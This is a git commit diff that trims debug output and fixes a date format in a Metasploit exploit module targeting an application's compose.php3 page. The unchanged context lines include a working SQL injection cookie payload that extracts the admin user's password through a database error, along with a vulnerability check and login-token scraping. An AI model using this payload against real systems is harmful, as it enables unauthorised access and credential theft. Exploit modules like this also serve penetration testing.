Removed some overly verbose output.

bug/bundler_fix
Daniel Jensen 2015-07-01 22:03:42 +12:00
parent 1ede519b8d
commit f48bb4250e
1 changed files with 2 additions and 4 deletions

View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'June 29 2015'
'DisclosureDate' => 'Jun 29 2015'
))
register_options(
@ -66,9 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
})
uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
vprint_status(uri1)
if res and res.body =~ /invalid input syntax for integer/
vprint_status("Looks vulnerable to the SQLi issue, probably fully vuln")
vprint_status("Looks vulnerable to the SQLi issue, probably fully vulnerable")
return Exploit::CheckCode::Vulnerable
else
vprint_status("**Sad trumpet sound**")
@ -103,7 +102,6 @@ class Metasploit3 < Msf::Exploit::Remote
#Find the hash token needed to login
login_hash = ''
vprint_status(get_login_hash.body)
get_login_hash.body.each_line do |line|
next if line !~ /name="hash" value="(.*)"/
login_hash = $1